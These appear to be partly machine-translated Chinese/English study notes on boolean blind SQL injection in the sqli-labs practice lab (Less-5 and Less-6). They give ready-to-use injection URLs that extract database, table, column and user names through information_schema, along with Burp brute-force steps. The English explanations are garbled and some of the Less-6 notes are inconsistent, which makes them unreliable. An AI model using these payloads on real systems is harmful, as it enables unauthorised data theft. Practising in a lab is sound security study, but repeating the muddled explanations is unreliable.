- left()函数: left(database(),1)=‘s’
left (a, b), taken from the left side of a front position b, a right is returned, an error is returned 0
select left (database (), 1) = 's'; s front whether a
regexp function: select user () regexp 'r'
The results user () is the root, regexp to match the root of the regular expression
like function: select user () is similar like 'ro%' matches regexp.
substr(a,b,c) select substr() XXXX
substr (a, b, c) starting from the position b, taken a bit string of length c
ascii () will be converted to a string value ascii
select ascii (substr ((select database ()), 1,1)); or a direct echo 115:
select ascii (substr ((select database ()), 1,1))> 110; if more than 110, it will return a 0 otherwise.
6. chr (number) or the ord ( 'letter') used in python two functions determine the current value is the number ascii
For security database:
Less-05
Guess there are three columns
Guess database
method one
http://192.168.50.254/sqli/Less-5/?id=1'and left((select database()),1)='s '--+;
burp capture brute force
、
After entering, to get the packet Burp, we send the data to the blasting module:
Then blasting module, first clear the other values, then add it as a variable to a
Select the type of brute force, the length is 1:
Thread 50
Crack the second letter
- 或者是使用if来进行判断测试:
- http://127.0.0.1/sqli/Less-5/?id=1‘ and ascii(substr((select database()),1,1))>156--+(此时是没有返回的) (这种方法是错误的)
因为此时没有选择任何数据库 数据库为空 所以不管写多大数都会有回显信息
http://192.168.50.100/sqli/Less-5/?id=1' and
ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100 --+
此处不回显 说明小于100
一个一个的猜库
猜第二个字母
以此类推得到库名 challenge
- 1. http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ 通过二分法猜解得到所有的库,红色为可变参数。
- 2. http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+ 再次通过二分法可猜解得到security下的所有表。其中,红色为可变参数。
- 3. http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --+ 通过二分法可猜解users内的字段,其中红色为可变参数。
- 4. http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select username from security.users limit 1,1),1,1))>1--+继续猜解即可得到字段内的值。
Less-6
加了单引号没有什么不同
加了双引号则报错
说明是布尔盲注
然后再爆列
3回显 4报错 说明有三列
- 完整注入流程:
- 1. http://127.0.0.1/sqli/Less-5/?id=1” and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ 通过二分法猜解得到所有的库,红色为可变参数。
- 2. http://127.0.0.1/sqli/Less-5/?id=1”and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+ 再次通过二分法可猜解得到security下的所有表。其中,红色为可变参数。
- 3. http://127.0.0.1/sqli/Less-5/?id=1” and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --+ 通过二分法可猜解users内的字段,其中红色为可变参数。
- 4. http://127.0.0.1/sqli/Less-5/?id=1”and ascii(substr((select username from security.users limit 1,1),1,1))>1--+继续猜解即可得到字段内的值。